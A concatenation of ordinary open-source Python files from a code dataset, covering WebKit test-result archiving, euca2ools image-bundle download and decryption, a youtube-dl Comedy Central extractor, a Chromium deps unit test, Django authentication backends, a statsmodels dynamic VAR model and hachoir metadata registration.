results_path = self._host.filesystem.join(self._results_directory, "full_results.json")
results_html = self._read_file_contents(results_path)
if not results_html:
return None
return LayoutTestResults.results_from_string(results_html)
def _create_unit_test_results(self):
results_path = self._host.filesystem.join(self._results_directory, "webkit_unit_tests_output.xml")
results_xml = self._read_file_contents(results_path)
if not results_xml:
return None
return UnitTestResults.results_from_string(results_xml)
def results(self):
layout_test_results = self._create_layout_test_results()
unit_test_results = self._create_unit_test_results()
if layout_test_results:
# FIXME: This is used to detect if we had N failures due to
# N tests failing, or if we hit the "exit-after-n-failures" limit.
# These days we could just check for the "interrupted" key in results.json instead!
layout_test_results.set_failure_limit_count(RunTests.NON_INTERACTIVE_FAILURE_LIMIT_COUNT)
if unit_test_results:
layout_test_results.add_unit_test_failures(unit_test_results)
return layout_test_results
def archive(self, patch):
filesystem = self._host.filesystem
workspace = self._host.workspace
results_directory = self._results_directory
results_name, _ = filesystem.splitext(filesystem.basename(results_directory))
# Note: We name the zip with the bug_id instead of patch_id to match work_item_log_path().
zip_path = workspace.find_unused_filename(self._archive_directory, "%s-%s" % (patch.bug_id(), results_name), "zip")
if not zip_path:
return None
if not filesystem.isdir(results_directory):
_log.info("%s does not exist, not archiving." % results_directory)
return None
archive = workspace.create_zip(filesystem.abspath(zip_path), filesystem.abspath(results_directory))
# Remove the results directory to prevent http logs, etc. from getting huge between runs.
# We could have create_zip remove the original, but this is more explicit.
filesystem.rmtree(results_directory)
return archive
| bsd-3-clause |
jhajek/euca2ools | euca2ools/commands/bundle/downloadandunbundle.py | 3 | 6029 | # Copyright 2009-2014 Eucalyptus Systems, Inc.
#
# Redistribution and use of this software in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import multiprocessing
import os.path
import sys
from requestbuilder import Arg
from requestbuilder.exceptions import ArgumentError
from requestbuilder.mixins import FileTransferProgressBarMixin
from euca2ools.bundle.util import open_pipe_fileobjs
from euca2ools.bundle.util import waitpid_in_thread
from euca2ools.commands.bundle.downloadbundle import DownloadBundle
from euca2ools.commands.bundle.mixins import BundleDownloadingMixin
from euca2ools.commands.bundle.unbundlestream import UnbundleStream
from euca2ools.commands.s3 import S3Request
class DownloadAndUnbundle(S3Request, FileTransferProgressBarMixin,
BundleDownloadingMixin):
DESCRIPTION = ('Download and unbundle a bundled image from the cloud\n\n '
'The key used to unbundle the image must match a '
'certificate that was used to bundle it.')
ARGS = [Arg('-d', '--destination', dest='dest', metavar='(FILE | DIR)',
default=".", help='''where to place the unbundled image
(default: current directory)'''),
Arg('-k', '--privatekey',
help='''file containing the private key to decrypt the bundle
with. This must match a certificate used when bundling the
image.''')]
# noinspection PyExceptionInherit
def configure(self):
S3Request.configure(self)
# The private key could be the user's or the cloud's. In the config
# this is a user-level option.
if not self.args.get('privatekey'):
config_privatekey = self.config.get_user_option('private-key')
if self.args.get('userregion'):
self.args['privatekey'] = config_privatekey
elif 'EC2_PRIVATE_KEY' in os.environ:
self.args['privatekey'] = os.getenv('EC2_PRIVATE_KEY')
elif config_privatekey:
self.args['privatekey'] = config_privatekey
else:
raise ArgumentError(
'missing private key; please supply one with -k')
self.args['privatekey'] = os.path.expanduser(os.path.expandvars(
self.args['privatekey']))
if not os.path.exists(self.args['privatekey']):
raise ArgumentError("private key file '{0}' does not exist"
.format(self.args['privatekey']))
if not os.path.isfile(self.args['privatekey']):
raise ArgumentError("private key file '{0}' is not a file"
.format(self.args['privatekey']))
self.log.debug('private key: %s', self.args['privatekey'])
def __open_dest(self, manifest):
if self.args['dest'] == '-':
self.args['dest'] = sys.stdout
self.args['show_progress'] = False
elif isinstance(self.args['dest'], basestring):
if os.path.isdir(self.args['dest']):
image_filename = os.path.join(self.args['dest'],
manifest.image_name)
else:
image_filename = self.args['dest']
self.args['dest'] = open(image_filename, 'w')
return image_filename
# Otherwise we assume it's a file object
def main(self):
manifest = self.fetch_manifest(
self.service, privkey_filename=self.args['privatekey'])
download_out_r, download_out_w = open_pipe_fileobjs()
try:
self.__create_download_pipeline(download_out_w)
finally:
download_out_w.close()
image_filename = self.__open_dest(manifest)
unbundlestream = UnbundleStream.from_other(
self, source=download_out_r, dest=self.args['dest'],
enc_key=manifest.enc_key, enc_iv=manifest.enc_iv,
image_size=manifest.image_size, sha1_digest=manifest.image_digest,
show_progress=self.args.get('show_progress', False))
unbundlestream.main()
return image_filename
def __create_download_pipeline(self, outfile):
downloadbundle = DownloadBundle.from_other(
self, dest=outfile, bucket=self.args['bucket'],
manifest=self.args.get('manifest'),
local_manifest=self.args.get('local_manifest'),
show_progress=False)
downloadbundle_p = multiprocessing.Process(target=downloadbundle.main)
downloadbundle_p.start()
waitpid_in_thread(downloadbundle_p.pid)
outfile.close()
def print_result(self, image_filename):
if (image_filename and
self.args['dest'].fileno() != sys.stdout.fileno()):
print 'Wrote', image_filename
| bsd-2-clause |
adazey/Muzez | libs/youtube_dl/extractor/comedycentral.py | 3 | 5881 | from __future__ import unicode_literals
from .mtv import MTVServicesInfoExtractor
from .common import InfoExtractor
class ComedyCentralIE(MTVServicesInfoExtractor):
_VALID_URL = r'''(?x)https?://(?:www\.)?cc\.com/
(video-clips|episodes|cc-studios|video-collections|shows(?=/[^/]+/(?!full-episodes)))
/(?P<title>.*)'''
_FEED_URL = 'http://comedycentral.com/feeds/mrss/'
_TESTS = [{
'url': 'http://www.cc.com/video-clips/kllhuv/stand-up-greg-fitzsimmons--uncensored---too-good-of-a-mother',
'md5': 'c4f48e9eda1b16dd10add0744344b6d8',
'info_dict': {
'id': 'cef0cbb3-e776-4bc9-b62e-8016deccb354',
'ext': 'mp4',
'title': 'CC:Stand-Up|August 18, 2013|1|0101|Uncensored - Too Good of a Mother',
'description': 'After a certain point, breastfeeding becomes c**kblocking.',
'timestamp': 1376798400,
'upload_date': '20130818',
},
}, {
'url': 'http://www.cc.com/shows/the-daily-show-with-trevor-noah/interviews/6yx39d/exclusive-rand-paul-extended-interview',
'only_matching': True,
}]
class ComedyCentralFullEpisodesIE(MTVServicesInfoExtractor):
_VALID_URL = r'''(?x)https?://(?:www\.)?cc\.com/
(?:full-episodes|shows(?=/[^/]+/full-episodes))
/(?P<id>[^?]+)'''
_FEED_URL = 'http://comedycentral.com/feeds/mrss/'
_TESTS = [{
'url': 'http://www.cc.com/full-episodes/pv391a/the-daily-show-with-trevor-noah-november-28--2016---ryan-speedo-green-season-22-ep-22028',
'info_dict': {
'description': 'Donald Trump is accused of exploiting his president-elect status for personal gain, Cuban leader Fidel Castro dies, and Ryan Speedo Green discusses "Sing for Your Life."',
'title': 'November 28, 2016 - Ryan Speedo Green',
},
'playlist_count': 4,
}, {
'url': 'http://www.cc.com/shows/the-daily-show-with-trevor-noah/full-episodes',
'only_matching': True,
}]
def _real_extract(self, url):
playlist_id = self._match_id(url)
webpage = self._download_webpage(url, playlist_id)
feed_json = self._search_regex(r'var triforceManifestFeed\s*=\s*(\{.+?\});\n', webpage, 'triforce feeed')
feed = self._parse_json(feed_json, playlist_id)
zones = feed['manifest']['zones']
video_zone = zones['t2_lc_promo1']
feed = self._download_json(video_zone['feed'], playlist_id)
mgid = feed['result']['data']['id']
videos_info = self._get_videos_info(mgid)
return videos_info
class ToshIE(MTVServicesInfoExtractor):
IE_DESC = 'Tosh.0'
_VALID_URL = r'^https?://tosh\.cc\.com/video-(?:clips|collections)/[^/]+/(?P<videotitle>[^/?#]+)'
_FEED_URL = 'http://tosh.cc.com/feeds/mrss'
_TESTS = [{
'url': 'http://tosh.cc.com/video-clips/68g93d/twitter-users-share-summer-plans',
'info_dict': {
'description': 'Tosh asked fans to share their summer plans.',
'title': 'Twitter Users Share Summer Plans',
},
'playlist': [{
'md5': 'f269e88114c1805bb6d7653fecea9e06',
'info_dict': {
'id': '90498ec2-ed00-11e0-aca6-0026b9414f30',
'ext': 'mp4',
'title': 'Tosh.0|June 9, 2077|2|211|Twitter Users Share Summer Plans',
'description': 'Tosh asked fans to share their summer plans.',
'thumbnail': 're:^https?://.*\.jpg',
# It's really reported to be published on year 2077
'upload_date': '20770610',
'timestamp': 3390510600,
'subtitles': {
'en': 'mincount:3',
},
},
}]
}, {
'url': 'http://tosh.cc.com/video-collections/x2iz7k/just-plain-foul/m5q4fp',
'only_matching': True,
}]
@classmethod
def _transform_rtmp_url(cls, rtmp_video_url):
new_urls = super(ToshIE, cls)._transform_rtmp_url(rtmp_video_url)
new_urls['rtmp'] = rtmp_video_url.replace('viacomccstrm', 'viacommtvstrm')
return new_urls
class ComedyCentralTVIE(MTVServicesInfoExtractor):
_VALID_URL = r'https?://(?:www\.)?comedycentral\.tv/(?:staffeln|shows)/(?P<id>[^/?#&]+)'
_TESTS = [{
'url': 'http://www.comedycentral.tv/staffeln/7436-the-mindy-project-staffel-4',
'info_dict': {
'id': 'local_playlist-f99b626bdfe13568579a',
'ext': 'flv',
'title': 'Episode_the-mindy-project_shows_season-4_episode-3_full-episode_part1',
},
'params': {
# rtmp download
'skip_download': True,
},
}, {
'url': 'http://www.comedycentral.tv/shows/1074-workaholics',
'only_matching': True,
}, {
'url': 'http://www.comedycentral.tv/shows/1727-the-mindy-project/bonus',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
mrss_url = self._search_regex(
r'data-mrss=(["\'])(?P<url>(?:(?!\1).)+)\1',
webpage, 'mrss url', group='url')
return self._get_videos_info_from_url(mrss_url, video_id)
class ComedyCentralShortnameIE(InfoExtractor):
_VALID_URL = r'^:(?P<id>tds|thedailyshow)$'
_TESTS = [{
'url': ':tds',
'only_matching': True,
}, {
'url': ':thedailyshow',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
shortcut_map = {
'tds': 'http://www.cc.com/shows/the-daily-show-with-trevor-noah/full-episodes',
'thedailyshow': 'http://www.cc.com/shows/the-daily-show-with-trevor-noah/full-episodes',
}
return self.url_result(shortcut_map[video_id])
| gpl-3.0 |
espadrine/opera | chromium/src/tools/deps2git/deps2submodules_unittest.py | 10 | 2847 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
import deps2submodules
class Deps2SubmodulesCollateDepsTest(unittest.TestCase):
def testBasic(self):
arg = ({
'src/monkeypatch': 'http://git.chromium.org/monkepatch.git@abc123',
'src/third_party/monkeyfood':
'http://git.chromium.org/monkeyfood@def456',
}, {}) # No OS-specific DEPS.
expected = {
'monkeypatch':
[['all'], 'http://git.chromium.org/monkepatch.git', 'abc123'],
'third_party/monkeyfood':
[['all'], 'http://git.chromium.org/monkeyfood', 'def456'],
}
self.assertEqual(expected, deps2submodules.CollateDeps(arg))
def testSrcPrefixStrip(self):
arg = ({
'src/in_src': 'http://git.chromium.org/src.git@f00bad',
'not_in_src/foo': 'http://other.git.something/main.git@123456',
}, {}) # No OS-specific DEPS.
expected = {
'in_src': [['all'], 'http://git.chromium.org/src.git', 'f00bad'],
'not_in_src/foo':
[['all'], 'http://other.git.something/main.git', '123456'],
}
self.assertEqual(expected, deps2submodules.CollateDeps(arg))
def testOSDeps(self):
arg = ({
'src/hotp': 'http://hmac.org/hotp.git@7fffffff',
}, {
'linux': {
'src/third_party/selinux': 'http://kernel.org/selinux.git@abc123',
'src/multios': 'http://git.chromium.org/multi.git@000005',
},
'mac': {
'src/third_party/security':
'http://opensource.apple.com/security.git@def456',
},
'win': {
'src/multios': 'http://git.chromium.org/multi.git@000005',
},
})
expected = {
'hotp': [['all'], 'http://hmac.org/hotp.git', '7fffffff'],
'third_party/selinux':
[['linux'], 'http://kernel.org/selinux.git', 'abc123'],
'third_party/security':
[['mac'], 'http://opensource.apple.com/security.git', 'def456'],
'multios':
[['win', 'linux'], 'http://git.chromium.org/multi.git', '000005'],
}
self.assertEqual(expected, deps2submodules.CollateDeps(arg))
def testOSDepsWithNone(self):
arg = ({
'src/skia': 'http://git.chromium.org/skia.git@abc123',
'src/aura': 'http://git.chromium.org/aura.git',
}, {
'ios': {
'src/skia': None,
'src/apple': 'http://git.chromium.org/apple.git@def456',
}
})
expected = {
'skia': [['all'], 'http://git.chromium.org/skia.git', 'abc123'],
'aura': [['all'], 'http://git.chromium.org/aura.git', ''],
'apple': [['ios'], 'http://git.chromium.org/apple.git', 'def456'],
}
self.assertEqual(expected, deps2submodules.CollateDeps(arg))
if __name__ == '__main__':
unittest.main()
| bsd-3-clause |
egenerat/flight-manager | django/contrib/auth/backends.py | 9 | 4446 | from django.db import connection
from django.contrib.auth.models import User, Permission
class ModelBackend(object):
"""
Authenticates against django.contrib.auth.models.User.
"""
supports_object_permissions = False
supports_anonymous_user = True
# TODO: Model, login attribute name and password attribute name should be
# configurable.
def authenticate(self, username=None, password=None):
try:
user = User.objects.get(username=username)
if user.check_password(password):
return user
except User.DoesNotExist:
return None
def get_group_permissions(self, user_obj):
"""
Returns a set of permission strings that this user has through his/her
groups.
"""
if not hasattr(user_obj, '_group_perm_cache'):
perms = Permission.objects.filter(group__user=user_obj
).values_list('content_type__app_label', 'codename'
).order_by()
user_obj._group_perm_cache = set(["%s.%s" % (ct, name) for ct, name in perms])
return user_obj._group_perm_cache
def get_all_permissions(self, user_obj):
if user_obj.is_anonymous():
return set()
if not hasattr(user_obj, '_perm_cache'):
user_obj._perm_cache = set([u"%s.%s" % (p.content_type.app_label, p.codename) for p in user_obj.user_permissions.select_related()])
user_obj._perm_cache.update(self.get_group_permissions(user_obj))
return user_obj._perm_cache
def has_perm(self, user_obj, perm):
return perm in self.get_all_permissions(user_obj)
def has_module_perms(self, user_obj, app_label):
"""
Returns True if user_obj has any permissions in the given app_label.
"""
for perm in self.get_all_permissions(user_obj):
if perm[:perm.index('.')] == app_label:
return True
return False
def get_user(self, user_id):
try:
return User.objects.get(pk=user_id)
except User.DoesNotExist:
return None
class RemoteUserBackend(ModelBackend):
"""
This backend is to be used in conjunction with the ``RemoteUserMiddleware``
found in the middleware module of this package, and is used when the server
is handling authentication outside of Django.
By default, the ``authenticate`` method creates ``User`` objects for
usernames that don't already exist in the database. Subclasses can disable
this behavior by setting the ``create_unknown_user`` attribute to
``False``.
"""
# Create a User object if not already in the database?
create_unknown_user = True
def authenticate(self, remote_user):
"""
The username passed as ``remote_user`` is considered trusted. This
method simply returns the ``User`` object with the given username,
creating a new ``User`` object if ``create_unknown_user`` is ``True``.
Returns None if ``create_unknown_user`` is ``False`` and a ``User``
object with the given username is not found in the database.
"""
if not remote_user:
return
user = None
username = self.clean_username(remote_user)
# Note that this could be accomplished in one try-except clause, but
# instead we use get_or_create when creating unknown users since it has
# built-in safeguards for multiple threads.
if self.create_unknown_user:
user, created = User.objects.get_or_create(username=username)
if created:
user = self.configure_user(user)
else:
try:
user = User.objects.get(username=username)
except User.DoesNotExist:
pass
return user
def clean_username(self, username):
"""
Performs any cleaning on the "username" prior to using it to get or
create the user object. Returns the cleaned username.
By default, returns the username unchanged.
"""
return username
def configure_user(self, user):
"""
Configures a user after creation and returns the updated user.
By default, returns the user unmodified.
"""
return user
| mit |
yl565/statsmodels | statsmodels/tsa/vector_ar/dynamic.py | 4 | 10037 | # pylint: disable=W0201
from statsmodels.compat.python import iteritems, string_types, range
import numpy as np
from statsmodels.tools.decorators import cache_readonly
import pandas as pd
from . import var_model as _model
from . import util
from . import plotting
FULL_SAMPLE = 0
ROLLING = 1
EXPANDING = 2
def _get_window_type(window_type):
if window_type in (FULL_SAMPLE, ROLLING, EXPANDING):
return window_type
elif isinstance(window_type, string_types):
window_type_up = window_type.upper()
if window_type_up in ('FULL SAMPLE', 'FULL_SAMPLE'):
return FULL_SAMPLE
elif window_type_up == 'ROLLING':
return ROLLING
elif window_type_up == 'EXPANDING':
return EXPANDING
raise Exception('Unrecognized window type: %s' % window_type)
class DynamicVAR(object):
"""
Estimates time-varying vector autoregression (VAR(p)) using
equation-by-equation least squares
Parameters
----------
data : pandas.DataFrame
lag_order : int, default 1
window : int
window_type : {'expanding', 'rolling'}
min_periods : int or None
Minimum number of observations to require in window, defaults to window
size if None specified
trend : {'c', 'nc', 'ct', 'ctt'}
TODO
Returns
-------
**Attributes**:
coefs : Panel
items : coefficient names
major_axis : dates
minor_axis : VAR equation names
"""
def __init__(self, data, lag_order=1, window=None, window_type='expanding',
trend='c', min_periods=None):
self.lag_order = lag_order
self.names = list(data.columns)
self.neqs = len(self.names)
self._y_orig = data
# TODO: deal with trend
self._x_orig = _make_lag_matrix(data, lag_order)
self._x_orig['intercept'] = 1
(self.y, self.x, self.x_filtered, self._index,
self._time_has_obs) = _filter_data(self._y_orig, self._x_orig)
self.lag_order = lag_order
self.trendorder = util.get_trendorder(trend)
self._set_window(window_type, window, min_periods)
def _set_window(self, window_type, window, min_periods):
self._window_type = _get_window_type(window_type)
if self._is_rolling:
if window is None:
raise Exception('Must pass window when doing rolling '
'regression')
if min_periods is None:
min_periods = window
else:
window = len(self.x)
if min_periods is None:
min_periods = 1
self._window = int(window)
self._min_periods = min_periods
@cache_readonly
def T(self):
"""
Number of time periods in results
"""
return len(self.result_index)
@property
def nobs(self):
# Stub, do I need this?
data = dict((eq, r.nobs) for eq, r in iteritems(self.equations))
return pd.DataFrame(data)
@cache_readonly
def equations(self):
eqs = {}
for col, ts in iteritems(self.y):
# TODO: Remove in favor of statsmodels implemetation
model = pd.ols(y=ts, x=self.x, window=self._window,
window_type=self._window_type,
min_periods=self._min_periods)
eqs[col] = model
return eqs
@cache_readonly
def coefs(self):
"""
Return dynamic regression coefficients as Panel
"""
data = {}
for eq, result in iteritems(self.equations):
data[eq] = result.beta
panel = pd.Panel.fromDict(data)
# Coefficient names become items
return panel.swapaxes('items', 'minor')
@property
def result_index(self):
return self.coefs.major_axis
@cache_readonly
def _coefs_raw(self):
"""
Reshape coefficients to be more amenable to dynamic calculations
Returns
-------
coefs : (time_periods x lag_order x neqs x neqs)
"""
coef_panel = self.coefs.copy()
del coef_panel['intercept']
coef_values = coef_panel.swapaxes('items', 'major').values
coef_values = coef_values.reshape((len(coef_values),
self.lag_order,
self.neqs, self.neqs))
return coef_values
@cache_readonly
def _intercepts_raw(self):
"""
Similar to _coefs_raw, return intercept values in easy-to-use matrix
form
Returns
-------
intercepts : (T x K)
"""
return self.coefs['intercept'].values
@cache_readonly
def resid(self):
data = {}
for eq, result in iteritems(self.equations):
data[eq] = result.resid
return pd.DataFrame(data)
def forecast(self, steps=1):
"""
Produce dynamic forecast
Parameters
----------
steps
Returns
-------
forecasts : pandas.DataFrame
"""
output = np.empty((self.T - steps, self.neqs))
y_values = self.y.values
y_index_map = dict((d, idx) for idx, d in enumerate(self.y.index))
result_index_map = dict((d, idx) for idx, d in enumerate(self.result_index))
coefs = self._coefs_raw
intercepts = self._intercepts_raw
# can only produce this many forecasts
forc_index = self.result_index[steps:]
for i, date in enumerate(forc_index):
# TODO: check that this does the right thing in weird cases...
idx = y_index_map[date] - steps
result_idx = result_index_map[date] - steps
y_slice = y_values[:idx]
forcs = _model.forecast(y_slice, coefs[result_idx],
intercepts[result_idx], steps)
output[i] = forcs[-1]
return pd.DataFrame(output, index=forc_index, columns=self.names)
def plot_forecast(self, steps=1, figsize=(10, 10)):
"""
Plot h-step ahead forecasts against actual realizations of time
series. Note that forecasts are lined up with their respective
realizations.
Parameters
----------
steps :
"""
import matplotlib.pyplot as plt
fig, axes = plt.subplots(figsize=figsize, nrows=self.neqs,
sharex=True)
forc = self.forecast(steps=steps)
dates = forc.index
y_overlay = self.y.reindex(dates)
for i, col in enumerate(forc.columns):
ax = axes[i]
y_ts = y_overlay[col]
forc_ts = forc[col]
y_handle = ax.plot(dates, y_ts.values, 'k.', ms=2)
forc_handle = ax.plot(dates, forc_ts.values, 'k-')
lines = (y_handle[0], forc_handle[0])
labels = ('Y', 'Forecast')
fig.legend(lines,labels)
fig.autofmt_xdate()
fig.suptitle('Dynamic %d-step forecast' % steps)
# pretty things up a bit
plotting.adjust_subplots(bottom=0.15, left=0.10)
plt.draw_if_interactive()
@property
def _is_rolling(self):
return self._window_type == ROLLING
@cache_readonly
def r2(self):
"""Returns the r-squared values."""
data = dict((eq, r.r2) for eq, r in iteritems(self.equations))
return pd.DataFrame(data)
class DynamicPanelVAR(DynamicVAR):
"""
Dynamic (time-varying) panel vector autoregression using panel ordinary
least squares
Parameters
----------
"""
def __init__(self, data, lag_order=1, window=None, window_type='expanding',
trend='c', min_periods=None):
self.lag_order = lag_order
self.neqs = len(data.columns)
self._y_orig = data
# TODO: deal with trend
self._x_orig = _make_lag_matrix(data, lag_order)
self._x_orig['intercept'] = 1
(self.y, self.x, self.x_filtered, self._index,
self._time_has_obs) = _filter_data(self._y_orig, self._x_orig)
self.lag_order = lag_order
self.trendorder = util.get_trendorder(trend)
self._set_window(window_type, window, min_periods)
def _filter_data(lhs, rhs):
"""
Data filtering routine for dynamic VAR
lhs : DataFrame
original data
rhs : DataFrame
lagged variables
Returns
-------
"""
def _has_all_columns(df):
return np.isfinite(df.values).sum(1) == len(df.columns)
rhs_valid = _has_all_columns(rhs)
if not rhs_valid.all():
pre_filtered_rhs = rhs[rhs_valid]
else:
pre_filtered_rhs = rhs
index = lhs.index.union(rhs.index)
if not index.equals(rhs.index) or not index.equals(lhs.index):
rhs = rhs.reindex(index)
lhs = lhs.reindex(index)
rhs_valid = _has_all_columns(rhs)
lhs_valid = _has_all_columns(lhs)
valid = rhs_valid & lhs_valid
if not valid.all():
filt_index = rhs.index[valid]
filtered_rhs = rhs.reindex(filt_index)
filtered_lhs = lhs.reindex(filt_index)
else:
filtered_rhs, filtered_lhs = rhs, lhs
return filtered_lhs, filtered_rhs, pre_filtered_rhs, index, valid
def _make_lag_matrix(x, lags):
data = {}
columns = []
for i in range(1, 1 + lags):
lagstr = 'L%d.'% i
lag = x.shift(i).rename(columns=lambda c: lagstr + c)
data.update(lag._series)
columns.extend(lag.columns)
return pd.DataFrame(data, columns=columns)
class Equation(object):
"""
Stub, estimate one equation
"""
def __init__(self, y, x):
pass
if __name__ == '__main__':
import pandas.util.testing as ptest
ptest.N = 500
data = ptest.makeTimeDataFrame().cumsum(0)
var = DynamicVAR(data, lag_order=2, window_type='expanding')
var2 = DynamicVAR(data, lag_order=2, window=10,
window_type='rolling')
| bsd-3-clause |
dgarciam/Sick-Beard | lib/hachoir_metadata/register.py | 90 | 7003 | from lib.hachoir_core.i18n import _
from lib.hachoir_core.tools import (
humanDuration, humanBitRate,
humanFrequency, humanBitSize, humanFilesize,
humanDatetime)
from lib.hachoir_core.language import Language
from lib.hachoir_metadata.filter import Filter, NumberFilter, DATETIME_FILTER
from datetime import date, datetime, timedelta
from lib.hachoir_metadata.formatter import (
humanAudioChannel, humanFrameRate, humanComprRate, humanAltitude,
humanPixelSize, humanDPI)
from lib.hachoir_metadata.setter import (
setDatetime, setTrackNumber, setTrackTotal, setLanguage)
from lib.hachoir_metadata.metadata_item import Data
MIN_SAMPLE_RATE = 1000 # 1 kHz
MAX_SAMPLE_RATE = 192000 # 192 kHz
MAX_NB_CHANNEL = 8 # 8 channels
MAX_WIDTH = 20000 # 20 000 pixels
MAX_BIT_RATE = 500 * 1024 * 1024 # 500 Mbit/s
MAX_HEIGHT = MAX_WIDTH
MAX_DPI_WIDTH = 10000
MAX_DPI_HEIGHT = MAX_DPI_WIDTH
MAX_NB_COLOR = 2 ** 24 # 16 million of color
MAX_BITS_PER_PIXEL = 256 # 256 bits/pixel
MAX_FRAME_RATE = 150 # 150 frame/sec
MAX_NB_PAGE = 20000
MAX_COMPR_RATE = 1000.0
MIN_COMPR_RATE = 0.001
MAX_TRACK = 999
DURATION_FILTER = Filter(timedelta,
timedelta(milliseconds=1),
timedelta(days=365))
def registerAllItems(meta):
meta.register(Data("title", 100, _("Title"), type=unicode))
meta.register(Data("artist", 101, _("Artist"), type=unicode))
meta.register(Data("author", 102, _("Author"), type=unicode))
meta.register(Data("music_composer", 103, _("Music composer"), type=unicode))
meta.register(Data("album", 200, _("Album"), type=unicode))
meta.register(Data("duration", 201, _("Duration"), # integer in milliseconde
type=timedelta, text_handler=humanDuration, filter=DURATION_FILTER))
meta.register(Data("nb_page", 202, _("Nb page"), filter=NumberFilter(1, MAX_NB_PAGE)))
meta.register(Data("music_genre", 203, _("Music genre"), type=unicode))
meta.register(Data("language", 204, _("Language"), conversion=setLanguage, type=Language))
meta.register(Data("track_number", 205, _("Track number"), conversion=setTrackNumber,
filter=NumberFilter(1, MAX_TRACK), type=(int, long)))
meta.register(Data("track_total", 206, _("Track total"), conversion=setTrackTotal,
filter=NumberFilter(1, MAX_TRACK), type=(int, long)))
meta.register(Data("organization", 210, _("Organization"), type=unicode))
meta.register(Data("version", 220, _("Version")))
meta.register(Data("width", 301, _("Image width"), filter=NumberFilter(1, MAX_WIDTH), type=(int, long), text_handler=humanPixelSize))
meta.register(Data("height", 302, _("Image height"), filter=NumberFilter(1, MAX_HEIGHT), type=(int, long), text_handler=humanPixelSize))
meta.register(Data("nb_channel", 303, _("Channel"), text_handler=humanAudioChannel, filter=NumberFilter(1, MAX_NB_CHANNEL), type=(int, long)))
meta.register(Data("sample_rate", 304, _("Sample rate"), text_handler=humanFrequency, filter=NumberFilter(MIN_SAMPLE_RATE, MAX_SAMPLE_RATE), type=(int, long, float)))
meta.register(Data("bits_per_sample", 305, _("Bits/sample"), text_handler=humanBitSize, filter=NumberFilter(1, 64), type=(int, long)))
meta.register(Data("image_orientation", 306, _("Image orientation")))
meta.register(Data("nb_colors", 307, _("Number of colors"), filter=NumberFilter(1, MAX_NB_COLOR), type=(int, long)))
meta.register(Data("bits_per_pixel", 308, _("Bits/pixel"), filter=NumberFilter(1, MAX_BITS_PER_PIXEL), type=(int, long)))
meta.register(Data("filename", 309, _("File name"), type=unicode))
meta.register(Data("file_size", 310, _("File size"), text_handler=humanFilesize, type=(int, long)))
meta.register(Data("pixel_format", 311, _("Pixel format")))
meta.register(Data("compr_size", 312, _("Compressed file size"), text_handler=humanFilesize, type=(int, long)))
meta.register(Data("compr_rate", 313, _("Compression rate"), text_handler=humanComprRate, filter=NumberFilter(MIN_COMPR_RATE, MAX_COMPR_RATE), type=(int, long, float)))
meta.register(Data("width_dpi", 320, _("Image DPI width"), filter=NumberFilter(1, MAX_DPI_WIDTH), type=(int, long), text_handler=humanDPI))
meta.register(Data("height_dpi", 321, _("Image DPI height"), filter=NumberFilter(1, MAX_DPI_HEIGHT), type=(int, long), text_handler=humanDPI))
meta.register(Data("file_attr", 400, _("File attributes")))
meta.register(Data("file_type", 401, _("File type")))
meta.register(Data("subtitle_author", 402, _("Subtitle author"), type=unicode))
meta.register(Data("creation_date", 500, _("Creation date"), text_handler=humanDatetime,
filter=DATETIME_FILTER, type=(datetime, date), conversion=setDatetime))
meta.register(Data("last_modification", 501, _("Last modification"), text_handler=humanDatetime,
filter=DATETIME_FILTER, type=(datetime, date), conversion=setDatetime))
meta.register(Data("latitude", 510, _("Latitude"), type=float))
meta.register(Data("longitude", 511, _("Longitude"), type=float))
meta.register(Data("altitude", 511, _("Altitude"), type=float, text_handler=humanAltitude))
meta.register(Data("location", 530, _("Location"), type=unicode))
meta.register(Data("city", 531, _("City"), type=unicode))
meta.register(Data("country", 532, _("Country"), type=unicode))
meta.register(Data("charset", 540, _("Charset"), type=unicode))
meta.register(Data("font_weight", 550, _("Font weight")))
meta.register(Data("camera_aperture", 520, _("Camera aperture")))
meta.register(Data("camera_focal", 521, _("Camera focal")))
meta.register(Data("camera_exposure", 522, _("Camera exposure")))
meta.register(Data("camera_brightness", 530, _("Camera brightness")))
meta.register(Data("camera_model", 531, _("Camera model"), type=unicode))
meta.register(Data("camera_manufacturer", 532, _("Camera manufacturer"), type=unicode))
meta.register(Data("compression", 600, _("Compression")))
meta.register(Data("copyright", 601, _("Copyright"), type=unicode))
meta.register(Data("url", 602, _("URL"), type=unicode))
meta.register(Data("frame_rate", 603, _("Frame rate"), text_handler=humanFrameRate,
filter=NumberFilter(1, MAX_FRAME_RATE), type=(int, long, float)))
meta.register(Data("bit_rate", 604, _("Bit rate"), text_handler=humanBitRate,
filter=NumberFilter(1, MAX_BIT_RATE), type=(int, long, float)))
meta.register(Data("aspect_ratio", 604, _("Aspect ratio"), type=(int, long, float)))
meta.register(Data("os", 900, _("OS"), type=unicode))
meta.register(Data("producer", 901, _("Producer"), type=unicode))
meta.register(Data("comment", 902, _("Comment"), type=unicode))
meta.register(Data("format_version", 950, _("Format version"), type=unicode))
